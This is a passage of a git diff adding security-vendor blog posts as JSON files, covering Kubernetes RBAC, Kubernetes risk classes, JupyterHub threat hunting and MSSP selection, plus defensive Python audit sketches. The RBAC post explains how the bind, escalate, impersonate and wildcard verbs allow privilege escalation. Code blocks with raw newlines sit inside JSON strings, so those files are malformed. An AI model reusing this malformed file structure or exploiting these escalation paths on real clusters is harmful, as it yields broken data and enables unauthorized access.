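    for user, hits in count_legacy_auth_users("userloggedin_export.jsonl").most_common(20):
        print(f"{user}: {hits} legacy-auth sign-ins")
```

The accounts that show up in that tally are the ones a cutover is most likely to break.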
We recommend making any of these changes in a phased roll out so that you can closely monitor changes for several days before implementing the next set of changes. Any one of these security measures will strengthen your security posture \u2014 but combined they complement each other to make your organization far more resilient against business email compromise (BEC) and unauthorized access." +} \ No newline at end of file diff --git a/understanding-role-based-access-control-in-kubernetes.json b/understanding-role-based-access-control-in-kubernetes.json new file mode 100644 index 0000000000000000000000000000000000000000..8ae7d06f68fd31cf64d58740f7856bbebdeb2e14 --- /dev/null +++ b/understanding-role-based-access-control-in-kubernetes.json @@ -0,0 +1,6 @@ +{ + "title": "Understanding role-based access control in Kubernetes", + "url": "https://expel.com/blog/understanding-role-based-access-control-in-kubernetes/", + "date": "Oct 26, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Understanding role-based access control in Kubernetes Security operations \u00b7 5 MIN READ \u00b7 DAN WHALEN \u00b7 OCT 26, 2022 \u00b7 TAGS: Cloud security This article originally appeared on ContainerJournal.com and can be found here . It\u2019s reprinted here with permission. \u201cI\u2019m sorry Dave, I\u2019m afraid I can\u2019t do that.\u201d \u2013 HAL 9000, 2001: A Space Odyssey This iconic quote from 2001: A Space Odyssey is a great place to start if you want to understand authorization in Kubernetes. In the movie, of course, HAL is a rogue artificial intelligence; imagine for a moment that he was instead a simpler, rules-based system responsible for allowing or denying requests. An astronaut might ask HAL to perform a task, like \u201cturn off the lights\u201d or \u201cpressurize the airlock.\u201d HAL, operating in (hopefully) the best interests of the astronauts and their spacecraft, must decide whether the request is reasonable and if the action should be taken. HAL needs to evaluate each request against a set of internal rules that define who is authorized to execute what actions that impact which resources. This is \u201cauthorization\u201d in a nutshell: a system of rules designed to determine whether or not something is allowed. Understanding authorization is critical to understanding how role-based access control (RBAC) works for securing Kubernetes. Whether you\u2019re a security professional starting to learn about Kubernetes or an engineer building with it, it\u2019s important to understand the basic systems and rules that govern Kubernetes. RBAC in Kubernetes While Kubernetes technically supports other authorization modes, RBAC tends to be the de facto mode for access control these days. Understanding how it works will help users provision the permissions their teams need and avoid handing them out unnecessarily to those that don\u2019t need them. These concepts are especially useful as security pros think about managing risk in Kubernetes by enforcing least-privilege best practices. Before getting into specifics, there are a few core design principles worth calling out: Access is denied by default and permissions can only be added. A user cannot grant permission for something they do not have the permission to do themselves. This is a built-in mechanism to prevent privilege escalation. 
Because Kubernetes relies on a trust relationship with an external identity provider\u2014such as an identity and access management (IAM) system\u2014there is no such thing as a \u201cKubernetes user.\u201d The external identity provider is responsible for managing users, while Kubernetes simply ensures users can prove they are who they claim to be and checks whether they are authorized to perform the desired action. Resource Types for RBAC Configuration As with everything Kubernetes, configuring RBAC policy is just a matter of creating the right resources. In this case, there are four resource types that control authorization: Roles, ClusterRoles, RoleBindings and ClusterRoleBindings. While some of these may sound similar, there are important differences. Roles and RoleBindings grant access within the scope of a single namespace while ClusterRoles and ClusterRoleBindings are generally used to provide access across the entire cluster (though there are exceptions). Defining roles and role bindings is as simple as whipping up manifests in YAML. The schema for these resources is well documented in the official Kubernetes docs, but it\u2019s important to understand how it works in practice. Below are a few examples to help illustrate the process: Example One: Granting Access to Read Pods for one Namespace Let\u2019s start with a simple example\u2014an administrator needs to grant \u201cDave\u201d access to get and list pods in a single namespace. They would start by creating a Role and RoleBinding that look something like this: They\u2019ve created two resources: a Role called pod-viewer and a RoleBinding called pod-viewers. The role defines what actions (aka \u201cverbs\u201d) can be taken against what kinds of \u201cresources.\u201d The RoleBinding is what maps principals (in this case, only Dave) to that role. In this example, Dave can only get and list pods in the \u201cfoo\u201d namespace. He will not be able to interact with any resources in the \u201cbar\u201d namespace. Example Two: Granting Cluster-Wide Access Now imagine the administrator wants Dave to be able to examine all pods in a cluster across all namespaces. One way to accomplish this is with a ClusterRole and ClusterRoleBinding, like so: At first glance, this may look similar to the previous example, but now Dave\u2019s access isn\u2019t limited to the \u201cfoo\u201d namespace. Because this results in broader, less restricted access, security analysts and engineers will correctly note that granting access across the entire cluster is risky. Generally speaking, it\u2019s important to avoid over-provisioning permissions. Given the frequency with which today\u2019s attackers are engaging in identity theft, over-provisioning can cause serious damage if an identity is compromised. Example 3: Binding ClusterRoles to Specific Namespaces Some organizations have a lot of users and a lot of namespaces. To keep operations moving smoothly, they may want to grant a common set of permissions to users for their individual namespaces. Fortunately, that doesn\u2019t mean they need to create a Role resource for each namespace. In fact, they can bind a ClusterRole to a single namespace with a RoleBinding: In this example, they have used a namespaced RoleBinding to bind Dave to the pod-viewer role only in the \u201cfoo\u201d namespace \u2014 which means he won\u2019t be able to access pods in other namespaces. This is functionally equivalent to the first example, the \u201cpod-viewer\u201d role can be reused across multiple namespaces. 
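To make the shape of these resources concrete, here is a rough sketch of Example One written as manifest-style Python dictionaries and dumped to YAML for kubectl apply. The names, the "foo" namespace and the user "dave" mirror the illustrative values above, and a comment notes how the roleRef changes for Example Three.

```python
# Rough sketch of Example One as manifest-shaped dictionaries. Dumping them to
# YAML gives files you could feed to `kubectl apply -f`. Names, the "foo"
# namespace and the user "dave" are the illustrative values from the text.
import yaml  # PyYAML

pod_viewer_role = {
    "apiVersion": "rbac.authorization.k8s.io/v1",
    "kind": "Role",
    "metadata": {"name": "pod-viewer", "namespace": "foo"},
    "rules": [
        {
            "apiGroups": [""],        # "" is the core API group, where pods live
            "resources": ["pods"],
            "verbs": ["get", "list"],
        }
    ],
}

pod_viewers_binding = {
    "apiVersion": "rbac.authorization.k8s.io/v1",
    "kind": "RoleBinding",
    "metadata": {"name": "pod-viewers", "namespace": "foo"},
    "subjects": [
        {"kind": "User", "name": "dave", "apiGroup": "rbac.authorization.k8s.io"}
    ],
    # For Example Three, roleRef would point at a ClusterRole instead of a Role,
    # while the RoleBinding itself stays namespaced to "foo".
    "roleRef": {
        "kind": "Role",
        "name": "pod-viewer",
        "apiGroup": "rbac.authorization.k8s.io",
    },
}

if __name__ == "__main__":
    print(yaml.safe_dump_all([pod_viewer_role, pod_viewers_binding], sort_keys=False))
```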
There is now one centralized place to manage a common set of permissions that can be used across a wide range of namespaces without granting users access to all of them. Not Everything in Kubernetes is Intuitive These basic tips can get users most of the way to understanding permissions in Kubernetes, but there are still a few specific intricacies that security professionals and engineers should understand. Aggregated ClusterRoles are one such example: Cluster role aggregation lets administrators add permissions to an existing ClusterRole without modifying the role itself. This is primarily used in situations where they need to add permissions to a default ClusterRole (like \u201cview\u201d or \u201cedit\u201d). While modifying the default role technically works, it can become problematic when upgrading clusters. Kubernetes can disrupt default role modifications, sometimes breaking required permissions. Fortunately, this can be avoided by aggregating additional permissions into an existing ClusterRole with a separate ClusterRole definition and a special annotation. While this sounds confusing, it\u2019s surprisingly easy to visualize: In the example above, the pod-mgr role only provides permissions to get pods. However, it\u2019s also aggregating any permissions from other ClusterRoles with the \u201cagg-pod-mgr\u201d label, so the effective permissions are get and list. Speaking of verbs, there are three \u201cuncommon verbs\u201d that nonetheless have an important effect on how authorization decisions are made in Kubernetes. At the risk of being overly dramatic, these verbs literally change the rules and are exceptions to some of the fundamental rules mentioned before. They are: \u201c Bind .\u201d Bind is the exception to the earlier rule about a user not being able to grant permission they don\u2019t already have. The bind verb allows the user to create a role-binding resource even if they don\u2019t have the permissions for the targeted role. Security analysts should watch out for this verb, as it\u2019s a common way to escalate privileges. \u201c Escalate .\u201d By default, users cannot edit a role they\u2019re already bound to in order to grant themselves additional privileges\u2014a reasonable precaution. The escalate verb gives them permission to do just that, bypassing the \u201cDoes this user already have these permissions?\u201d check that normally occurs when editing a role. \u201c Impersonate .\u201d Impersonation is a mechanism that allows a user to run an API request acting as a different principal (user, group, service account). It\u2019s like the equivalent of the \u201csu\u201d command in Linux, but for Kubernetes. Typically, this verb is only used by highly privileged administrators to help debug permissions issues, so security professionals should scrutinize use of the impersonate verb to make sure there isn\u2019t an unexpected path to escalate privileges. Finally, it\u2019s important to be aware of the asterisk\u2014also known as the \u201cwildcard character\u2014which may mean an action is granting more permissions than intended. For example, granting the \u201c*\u201d verb on ClusterRoles might seem safe because there are built-in privilege escalation prevention checks, but that is not the case. As covered above, this would grant \u201cbind\u201d and \u201cescalate\u201d access as well, for privilege escalation. Because of unintended consequences like this, the wildcard characters should only be used with care. 
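Because these verbs are easy to miss in a large cluster, it can be worth periodically auditing roles for them. Here is a hedged sketch using the official Kubernetes Python client; it assumes a working kubeconfig and simply lists ClusterRoles, flagging any rule that grants bind, escalate, impersonate or a wildcard verb.

```python
# Illustrative audit sketch: list ClusterRoles and flag rules that grant the
# "uncommon" verbs discussed above (bind, escalate, impersonate) or a wildcard.
# Assumes the official `kubernetes` Python client and a working kubeconfig.
from kubernetes import client, config

RISKY_VERBS = {"bind", "escalate", "impersonate", "*"}


def audit_cluster_roles() -> None:
    config.load_kube_config()  # or load_incluster_config() when running in a pod
    rbac = client.RbacAuthorizationV1Api()
    for role in rbac.list_cluster_role().items:
        for rule in role.rules or []:
            flagged = set(rule.verbs or []) & RISKY_VERBS
            if flagged:
                print(
                    f"ClusterRole {role.metadata.name}: "
                    f"verbs={sorted(flagged)} resources={rule.resources}"
                )


if __name__ == "__main__":
    audit_cluster_roles()
```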
Securing Kubernetes is Increasingly Essential Access control in Kubernetes is massively important, especially as Kubernetes becomes increasingly common for production and business-critical workloads. Understanding how RBAC authorization works is crucial for granting necessary permissions, but it remains important to avoid handing out more permissions than necessary and maintain a least-privilege mindset. Today\u2019s attackers are becoming increasingly savvy when it comes to exploiting overlapping permissions, misconfigurations, and stolen identities. Effective role-based access control in Kubernetes can help keep those exposures to a minimum." +} \ No newline at end of file diff --git a/understanding-the-3-classes-of-kubernetes-risk.json b/understanding-the-3-classes-of-kubernetes-risk.json new file mode 100644 index 0000000000000000000000000000000000000000..55e46d2ef43d5dad9745486f610cc06061637e8b --- /dev/null +++ b/understanding-the-3-classes-of-kubernetes-risk.json @@ -0,0 +1,6 @@ +{ + "title": "Understanding the 3 Classes of Kubernetes Risk", + "url": "https://expel.com/blog/understanding-the-3-classes-of-kubernetes-risk/", + "date": "Jan 30, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Understanding the 3 Classes of Kubernetes Risk Security operations \u00b7 1 MIN READ \u00b7 DAN WHALEN \u00b7 JAN 30, 2023 \u00b7 TAGS: Cloud security This article originally appeared on DarkReading.com and can be found here . It\u2019s reprinted here with permission. The first step toward securing Kubernetes environments is understanding the risks they pose and identifying the ways in which those risks can be mitigated. A few short years ago, not many people had heard of the word \u201cKubernetes.\u201d Today, the open source container tool is becoming increasingly ubiquitous, with a rapidly growing number of businesses using Kubernetes to facilitate a more streamlined and scalable application development process. But as its convenience and scalability lead to greater adoption, protecting Kubernetes environments has become a challenge. Security and IT leaders who want to keep their Kubernetes environments secure must be aware of the three primary classes of risk they face \u2014 and how to mitigate them. Class 1: Accidental Misconfigurations Thus far, accidental misconfigurations have been the most common form of Kubernetes risk \u2014 the one most security experts are likely to be familiar with. Misconfigurations can occur anytime a user does something that unintentionally introduces risk into the environment. That might mean adding a workload that grants unnecessary permissions or accidentally creating an opening for someone from the anonymous Internet to access the system. Kubernetes is still relatively new to many, which means it can be easy to make mistakes. Fortunately, there are several ways to mitigate misconfigurations. Just about everything that happens in Kubernetes automatically produces an audit log, and security teams can monitor those logs for anomalous signs. Many businesses do this by sending the logs to a security information and event management (SIEM) platform, which can identify predetermined signs of misconfiguration. Additionally, tools (both paid and open source) are available that can be used to scan your Kubernetes environment for best practice violations. Once the problem is identified, an alert can be sent to the appropriate party and the problem triaged. To continue reading the rest of this article, visit DarkReading.com ." 
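As a small illustration of the audit-log monitoring idea above, here is a hedged sketch that scans exported Kubernetes audit events for requests made by the anonymous user. The file path and JSON-lines layout are assumptions; in practice these events would usually be shipped to a SIEM rather than read from disk.

```python
# Hedged sketch: scan exported Kubernetes audit events (JSON lines) for requests
# made by the anonymous user, one common sign of an accidental exposure.
import json
from typing import List, Dict


def find_anonymous_requests(path: str) -> List[Dict]:
    hits = []
    with open(path, "r", encoding="utf-8") as handle:
        for line in handle:
            event = json.loads(line)
            username = event.get("user", {}).get("username", "")
            if username == "system:anonymous":
                hits.append(
                    {
                        "verb": event.get("verb"),
                        "uri": event.get("requestURI"),
                        "source_ips": event.get("sourceIPs"),
                    }
                )
    return hits


if __name__ == "__main__":
    for hit in find_anonymous_requests("kube-audit.jsonl"):
        print(f"anonymous request: {hit['verb']} {hit['uri']} from {hit['source_ips']}")
```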
+} \ No newline at end of file diff --git a/using-jupyterhub-for-threat-hunting-then-you-should.json b/using-jupyterhub-for-threat-hunting-then-you-should.json new file mode 100644 index 0000000000000000000000000000000000000000..d06d7b4fff7641fa9a5fcde5a216b0c780c4dc55 --- /dev/null +++ b/using-jupyterhub-for-threat-hunting-then-you-should.json @@ -0,0 +1,6 @@ +{ + "title": "Using JupyterHub for threat hunting? Then you should ...", + "url": "https://expel.com/blog/jupyterhub-threat-hunting-8-tricks/", + "date": "Nov 19, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Using JupyterHub for threat hunting? Then you should know these 8 tricks. Security operations \u00b7 8 MIN READ \u00b7 ANDREW PRITCHETT \u00b7 NOV 19, 2019 \u00b7 TAGS: Get technical / How to / Hunting / SOC / Tools \u201cTest, learn, iterate\u201d is a mantra that\u2019s often repeated around the Expel office. I\u2019m not sure exactly how \u201cTest, learn, iterate\u201d became a thing, but if I had a dollar for every time Jon Hencinski said it, I\u2019d be living large on a private island somewhere. One of the services we offer here at Expel is threat hunting , and earlier this year our team set out to enhance our existing offering. \u201cLet\u2019s build a new tool within our existing ecosystem to better support hunting,\u201d we decided. Building a better threat hunting tool Of course \u201cbuilding a new tool\u201d is no small feat. Before we put hands to keyboards, we needed to define what a \u201cbetter\u201d threat hunting tool would look like. What new features and capabilities do our customers want? What kind of data will we need to interface with? How will the analysts interact with that data? What kind of workflows will allow us to be more productive? How do we define and measure that increase in productivity? The backbone of our existing threat hunting ecosystem is Expel Workbench \u2014 that\u2019s our one-stop-shop for our analysts to triage alerts, investigate incidents and communicate important info to our customers. While our hunting tools need to be baked into Expel Workbench, experimentation and rapid dev practices are out of the question in that environment. The experimentation dilemma Because experimenting directly in Expel Workbench can impact customers and the SOC, we started brainstorming other ways to iterate and test our new code that wouldn\u2019t impact the day-to-day functionality of the system. A few of us started using Jupyter Notebook as a training and development aid to assist analysts in learning new hunting techniques and providing decision support. If you aren\u2019t familiar, Jupyter Notebook offers \u201can open-source web application that allows you to create and share documents that contain live code, equations, visualizations and narrative text.\u201d We decided that if a Jupyter Notebook can provide structure to a workflow and decision support for analysts, why couldn\u2019t we inject the data into the workflow and pair the data output with the decision support? Using JupyterHub for threat hunting To also address our need for rapid development, process isolation and ease of access for our analysts, we soon decided that using JupyterHub was a good approach \u2014 it\u2019s a multi-user server designed for Jupyter Notebook. (If you want to learn more about JupyterHub, why we like it so much and the tips and tricks we learned along the way, check out this post: \u201c Our journey to JupyterHub and beyond. 
\u201d) Jupyter Notebook gave us the freedom to rethink the way we analyzed data that was collected for hunting. Instead of only providing analysts with one large output of data to review, such as a CSV of results, we can now enrich the data with additional context from other events and partner APIs, we can graph or plot the data for visualizations and we can combine other references or artifact lookups into the interface where the analyst has quick and easy access. Image: Example of references, artifact lookups and event enrichment from an Amazon Web Services (AWS) hunt. If you\u2019re curious about using JupyterHub for threat hunting decision support in your own org, here are a couple tips we\u2019ve learned and implemented that might be helpful to you and your team as you get up and running: Use a template-based deployment design If you\u2019re like us, you\u2019ve got many different hunting techniques and are always looking to add more to your library. A template acts as a chassis that has all of the necessities baked into it. We decided to engineer a fully customizable chassis that is configurable by a YAML config file. This gives non-engineering folks the ability to self-service the creation of new hunting techniques. In our ecosystem at Expel, we love to crowdsource our workloads across teams. The more people who can contribute to new hunt techniques, the faster we can turn out more high-quality hunts. Our hunting template includes the ability to: Authenticate and interact with our Workbench API Ingest and normalize data from multiple source types and devices Enrich customer hunting data with approved third-party intel APIs Tag and annotate important or noteworthy data Suppress irrelevant or false positive data Sort, filter and search of all data in the hunt Relevant references, graphs, charts and tables for further context Report stats such as time to complete a hunt, number of findings Generate audit trails, such as what data is being suppressed or reported Add raw data to a formatted findings report in Workbench Image: Example of sort, filter, search of all data in the hunt from an AWS hunt. Create a method for capturing and reporting user stats It\u2019s tough to get users to provide you with quality feedback. Everyone is busy and wants to be helpful but honest, quality feedback is hard to come by and in general response rates are often low. We do have a process for collecting feedback, feature requests and bugs; however, if you collect lots of user metrics, your results will start to tell a story and guide you toward what\u2019s working and what\u2019s not \u2014 without ever having to bug your users to share their feedback. If you build this into your template early, you can standardize on the stats you\u2019re going to have in all of your future technique deployments. This is absolutely key if you want to \u201ctest, learn and iterate.\u201d The majority of what we learn comes from trends we discover in our metrics \u2014 and then we\u2019re able to easily make adjustments to our processes based on what we learn from our users. Image: Example graph from our metrics notebook. Don\u2019t forget about enrichment Enrichment is key to a successful hunting program. Enrichment is taking an artifact and using it to derive additional information or context. For example, from an IP address artifacts, we can enrich it to find out the geolocation or its origin, the owning organization, whether the owning organization is an ISP or a hosting provider. 
With this additional information, we can now draw new conclusions from our IP address artifact. Raw logs for two different logon events will appear nearly identical at first review to an analyst. However, if you add enrichment data \u2014 like the owning organization of the source IP address, the geo-location of the source IP address or whether the IP address is associated with TOR or a datacenter \u2014 all of a sudden the data becomes dimensional and anomalies start to stand out. There\u2019s tremendous value in tags, annotation and suppression From month to month, environments change because of administrative updates, software updates and patches. Sometimes we\u2019ll conduct a well-established hunt technique, yet we get unexpected results due to recent changes in the environment. We found it\u2019s invaluable to give analysts the ability to tune the hunt on the fly. Additionally, sharing information between analysts from hunt to hunt and month to month has proved to be valuable, too. For example, if an analyst confirms that it\u2019s normal for Employee A at Organization Y to frequently log in from both the New York City and London offices, then the analyst can tag this type of activity. Then other analysts conducting future hunts don\u2019t need to repeat the same investigative legwork later, only to arrive at the same \u201cbusiness as usual\u201d conclusion. Allow for internal auditing Our tags and suppressions help us deliver efficient hunting results. That\u2019s why we built a special notebook just for auditing all our tags and suppressions. Senior analysts regularly review our tags and suppressions for accuracy and quality. Since we already have a regular cadence for quality assurance, we decided to also pull a sample set of findings reports into this notebook in order to review and improve our final delivery formats for our customers. This helps us all learn and improve, and allows us to iterate on our processes and deliverables to better serve our customers. Image: Preview of our quality assurance and audit notebook. Embrace downselects Downselects are what we call the smaller subsets of data that focus on a key aspect of the technique or generate a frequency count. Downselects can be reference links, graphs, charts, timelines, tables or a mini stats report. We found that it\u2019s great to have a few on each hunt; however, we also discovered that too many can be distracting and cause an analyst to feel disconnected from the overarching technique. We\u2019re still iterating on this one, and will report back soon (maybe even with a follow-up blog post). Image: Example of a mini stats report from an AWS hunt. Image: Example of a graph from an AWS hunt. Consistency can help drive efficiency At Expel, we strive to give all our customers a tailored experience. But there needs to be a careful balance between customization and consistency in order to drive efficiency. We\u2019ve chosen to have our analysts write unscripted, detailed messages to our customers regarding items identified in a findings report. Many other MSSPs and MDRs automate these. However, to maintain efficiency and a higher standard of delivery, we decided to import the analyst\u2019s message into the code and format the overall findings report. 
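Picking the enrichment idea back up for a moment, here is a minimal sketch of IP enrichment in Python. It assumes you have the free MaxMind GeoLite2 City and ASN databases downloaded locally and maintain your own list of TOR exit nodes; the file paths and the sample IP are placeholders, not part of Expel's tooling.

```python
# Minimal IP enrichment sketch: geolocation, owning org/ASN, and a TOR check.
# Assumes GeoLite2 databases on disk and a locally maintained tor_exits.txt.
import geoip2.database


def enrich_ip(ip: str, city_db: str, asn_db: str, tor_exit_file: str) -> dict:
    with geoip2.database.Reader(city_db) as city_reader, \
         geoip2.database.Reader(asn_db) as asn_reader:
        city = city_reader.city(ip)
        asn = asn_reader.asn(ip)
    with open(tor_exit_file) as fh:
        tor_exits = {line.strip() for line in fh}
    return {
        "ip": ip,
        "country": city.country.iso_code,
        "city": city.city.name,
        "org": asn.autonomous_system_organization,
        "asn": asn.autonomous_system_number,
        "is_tor_exit": ip in tor_exits,
    }


if __name__ == "__main__":
    # Two "identical" logon events look very different once enriched.
    print(enrich_ip("203.0.113.7", "GeoLite2-City.mmdb", "GeoLite2-ASN.mmdb", "tor_exits.txt"))
```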
Also, instead of having a custom set of downselects written for each hunt, we wrote a library of a few good downselects, like a widget that displays frequencies of recurring events, a bar chart that displays the number of events over time, and a widget for looking up domains and IPs using our partner APIs. We can reuse these downselects between different hunts to reduce the overall amount of code and maintain consistency for our analysts between hunts. Fewer panes of glass drive efficiency Nobody likes looking through multiple panes of glass to conduct a hunt technique. We learned this early on. We used to have analysts hunt in one browser tab, with a suggested workflow and technique guide in another browser tab. We quickly discovered it\u2019s too hard to keep flipping back and forth. In our current template, we keep the same layout to maintain consistency for analysts between different hunting techniques, which reduces the amount of \u201cjumping around\u201d between different tasks within the workflow. Our layout includes the following items in this order: Authentication handler for various APIs Overview of the hunt technique What pre-filtering has already been applied during data collection Key things to look for and what evil might look like Suggested containment or remediation steps if evil is identified Analyst notes, tags and suppressions We just show what is relevant to the active hunt and hide inactive tags and suppressions Hunt data All of the unsuppressed results are displayed here with the ability to sort, filter and search Downselects Each downselect includes four keys in the YAML config file: Title: High level summary of what the downselect does Description: How is the data being manipulated or filtered and why Observables: This is a list of very specific things the analyst should watch out for that would represent indicators of known evil References: This is a list of internal and third-party resources where the analyst can learn more about the specific security aspect or indicator focused on by the downselect; it includes things like links to specific MITRE Att&k articles or reputable blog posts The downselect data; sometimes the data is a table which can be sorted, filtered and searched but other times it\u2019s a bar chart, diagram or map The downselect data appears directly in line and above the reference data to reduce pivots for the analyst What we\u2019re seeing so far Now that we have better stats for hunting, we have a clearer understanding of the volume of data our analysts are reviewing, what hunts require more or less time to analyze and complete and the amount of findings being reported by our various hunts. It\u2019s still early for us when it comes to collecting metrics, but we\u2019re starting to make more informed decisions about what hunts are working, why they\u2019re useful and where they tend to work best. This will help us continually improve our overall hunting program. What\u2019s next We\u2019re still in a \u201ctest, learn, iterate\u201d phase when it comes to JupyterHub, improving our hunting tools and techniques over time. As we identify the things that work best for our analysts, we\u2019re recording those items for our blueprints and wish lists and making continuous improvements to our hunting program." 
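As an illustration of the reusable downselect idea described above, here is a minimal sketch of a frequency-count downselect driven by a config whose keys mirror the ones listed in the post (title, description, observables, references). The column names and sample data are made up; this is not Expel's actual notebook code.

```python
# Minimal reusable "frequency count" downselect sketch for a hunt notebook.
# Config keys mirror the fields described in the post; data is illustrative.
import pandas as pd

FREQ_BY_SOURCE_ORG = {
    "title": "Console logins by source organization",
    "description": "Counts successful console logins per owning org of the source IP.",
    "observables": ["Hosting providers or TOR exits with successful logins"],
    "references": ["https://attack.mitre.org/techniques/T1078/"],
    "group_by": "src_org",  # column to count
}


def render_downselect(hunt_data: pd.DataFrame, config: dict) -> pd.DataFrame:
    print(config["title"])
    print(config["description"])
    print("Watch for:", "; ".join(config["observables"]))
    print("References:", "; ".join(config["references"]))
    counts = (
        hunt_data.groupby(config["group_by"])
        .size()
        .sort_values(ascending=False)
        .rename("events")
        .reset_index()
    )
    return counts  # rendered inline in the notebook for the analyst


if __name__ == "__main__":
    sample = pd.DataFrame(
        {"user": ["a", "b", "a", "c"], "src_org": ["Comcast", "HostingCo", "Comcast", "TOR"]}
    )
    print(render_downselect(sample, FREQ_BY_SOURCE_ORG))
```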
+} \ No newline at end of file diff --git a/viva-las-vegas-expel-heads-to-black-hat.json b/viva-las-vegas-expel-heads-to-black-hat.json new file mode 100644 index 0000000000000000000000000000000000000000..82914445f397ff1eef19ed39a470f444b7087854 --- /dev/null +++ b/viva-las-vegas-expel-heads-to-black-hat.json @@ -0,0 +1,6 @@ +{ + "title": "Viva Las Vegas! Expel heads to Black Hat", + "url": "https://expel.com/blog/expel-heads-to-black-hat/", + "date": "Jul 19, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Viva Las Vegas! Expel heads to Black Hat Expel insider \u00b7 2 MIN READ \u00b7 KELLY FIEDLER \u00b7 JUL 19, 2022 \u00b7 TAGS: Company news Q: What\u2019s the best part about summer? A: Summer Camp. Except this time, leave your bug spray and sleeping bag at home. Hacker Summer Camp (AKA: Black Hat) is back, and we\u2019re ready to pop up our tent (re: booth) on the show floor for the first time as exhibitors! Hot off of RSA Conference (RSAC), our carry-on bag to Vegas is full of recent, impactful product advancements to help our customers stay ahead of the cyber threats of today (and tomorrow). Think: ransomware, business email compromise (BEC), supply chain attacks, cryptojacking, and so on. So how do we help? First, Expel plugs the gaps in your detection coverage. Our friendly detection bot, Josie\u2122, uses your unique business context to enrich and correlate alerts to detect things earlier\u2014amplifying signals to spot behaviors you could otherwise miss across on-prem, cloud infrastructure, and SaaS apps. Then, our other (equally friendly) bot, Ruxie\u2122, does the tedious triage work so that humans can focus on the response decisions that humans make best. We quickly get to remediation (recommendations or automated\u2014you tell us!) to stop threats from spreading. The best part? We do all of that in 21 minutes or less. Yup\u2014that fast. When it\u2019s all said and done, we look at each investigation as a learning opportunity. We ask ourselves key questions, like: what were the root causes? And how do your peers compare? The whole time, our enhanced dashboards show you how your existing security investments and Expel are performing, so you can keep us accountable\u2014a strategy which only increases in importance as more applications and workloads move into the cloud. At the end of the day, we know security isn\u2019t just a checkbox\u2014it should empower your business. We\u2019re here to help your security team understand and address issues, minimize risk, and grow. If you can\u2019t tell, we love geeking out about this stuff\u2014and we\u2019d love to geek out with you in Vegas. To kick things off at Black Hat, we\u2019re hosting a \u201c Cuts & Cocktails \u201d reception at The Barbershop in the Cosmopolitan on Tuesday, August 9, 6 \u2013 9pm PT. Register here for a fresh cut, shave, (dry) hair styling, and makeup touch-ups to help you get ready for a night on the town and to hit the show floor. After you freshen up, head to the authentic speakeasy hidden in the back of the barbershop\u2014don\u2019t tell anyone we told you\u2014for craft cocktails, heavy hors d\u2019oeuvres, and the return of YouTube ( and RSAC ) sensation, Harry Mack ! (Shoutout to our sponsors, Tevora and Exabeam , for helping to make it all happen.) If you want to see for yourself how Expel is helping companies of all shapes and sizes make sense of security, book a meeting and stop by our booth (2861) on August 10 and 11." 
+} \ No newline at end of file diff --git a/warning-signs-that-your-mssp-isn-t-the-right-fit.json b/warning-signs-that-your-mssp-isn-t-the-right-fit.json new file mode 100644 index 0000000000000000000000000000000000000000..e61f4e82b6eab2ef582900c3faed4f6319466310 --- /dev/null +++ b/warning-signs-that-your-mssp-isn-t-the-right-fit.json @@ -0,0 +1,6 @@ +{ + "title": "Warning signs that your MSSP isn't the right fit", + "url": "https://expel.com/blog/warning-signs-mssp-isnt-right-fit/", + "date": "Nov 2, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG Warning signs that your MSSP isn\u2019t the right fit Security operations \u00b7 7 MIN READ \u00b7 ANDREW HOYT \u00b7 NOV 2, 2017 \u00b7 TAGS: Managed security / Management / Selecting tech There are two sides to every relationship. When they go bad it\u2019s easy to blame yourself. But I\u2019m here to tell you, dear reader, that you don\u2019t need to (and shouldn\u2019t) accept mediocrity. There are many managed security service providers (MSSPs) out there \u2014 some of which do a few things really well, and some that well\u2026 don\u2019t. If you\u2019re trapped in a failing (or failed) relationship with your MSSP you\u2019re not alone. Here are some warning signs to look out for that indicate it\u2019s probably time to start considering some other options. Warning #1: The MSSP can\u2019t use the new product(s) you just bought You fought hard for budget and you\u2019ve spun up the new [insert cool technology product] in your environment. You even splurged on hiring and training staff to set it up, maintain it and look at the logs/alerts it generates. Why? Because that data is important to you. Except, you were hoping your new MSSP would be able to take that work off your hands so you can redeploy those resources. That\u2019s why you were so surprised when your MSSP told you that not only do they not support your new product, they\u2019ve got their own flavor of the product you just bought and they\u2019re going to have to put it in your environment for the service to work. So much for deploying those resources elsewhere. You\u2019re also going to need to find a way to correlate that data with the stuff coming from your MSSP, so you\u2019ll probably just dump everything into a SIEM and treat the MSSP as another alert feed. That\u2019s not how it was supposed to be (and it really doesn\u2019t have to). The right partner should use your existing technology. They shouldn\u2019t just integrate with the \u201cmeat and potatoes\u201d technologies in your infrastructure (think firewalls, IDS/IPS). They should also use the shiny new technologies you\u2019ve invested in to find modern threats (think endpoint detection and response (EDR)). If you see this warning sign here are a few questions to keep in your back pocket: What do you need to do to deploy the MSSP\u2019s service? Correct answer: Minimal software, no hardware, simple configuration changes. What, if any, additional products do you have to buy or replace to get value out of the service? Correct answer: None. What products do they support? Correct answer: Hopefully everything you already have. Realistic answer: The majority of what you have, especially the technologies you\u2019re already monitoring yourself and other important components are on the roadmap. This should include network and endpoint technologies! Warning #2: The onboarding process never ends You made it through the procurement process and got a signature on the contract. You thought you\u2019d be off to the races. 
But your MSSP dumped a bomb on you in the first call\u2026and your stomach dropped a bit. There were hundreds of pages of documentation, dozens of phone calls and meetings and project plans that stretched out into forever. It\u2019s months later and you\u2019re still onboarding while the promised value still lies somewhere over the (infinite) horizon. Your standards can and should be higher. The right partner should provide an onboarding experience that\u2019s point-and-click easy \u2014 closer to your smartphone than a call to your Cable TV provider\u2019s customer support line. Once data is flowing to your provider, you should be receiving value. In short, onboarding should take days (or even hours), and value should come in less than a week. If you feel like you\u2019re entering the onboarding danger zone ask these questions: How long will it take to onboard all in-scope technologies for the service? Correct answer: A week, max. Is there documentation for the onboarding process? Can I see it? Correct answer: Yes\u2026 and yes. And\u2026a bonus question. Can I onboard a device (or three) as a proof-of-concept before I sign up for the service? Correct answer: We\u2019d love that Likely answer: Ummmm\u2026 [awkward silence] Warning #3: You\u2019re getting lots of alerts\u2026but few answers You\u2019re onboarded! You\u2019re getting ready to sit back and let your MSSP work for you. And then it happens. Your morning email digest shows up\u2026 and it\u2019s full of alerts. 50 of them to be specific. What happened? Which ones are most important? Has there been a breach or are they just suspicious? Are any of the alerts related to each other? Or are they independent events that should be treated as separate incidents? How were they detected? Is this the beginning, middle, or end of an attack? 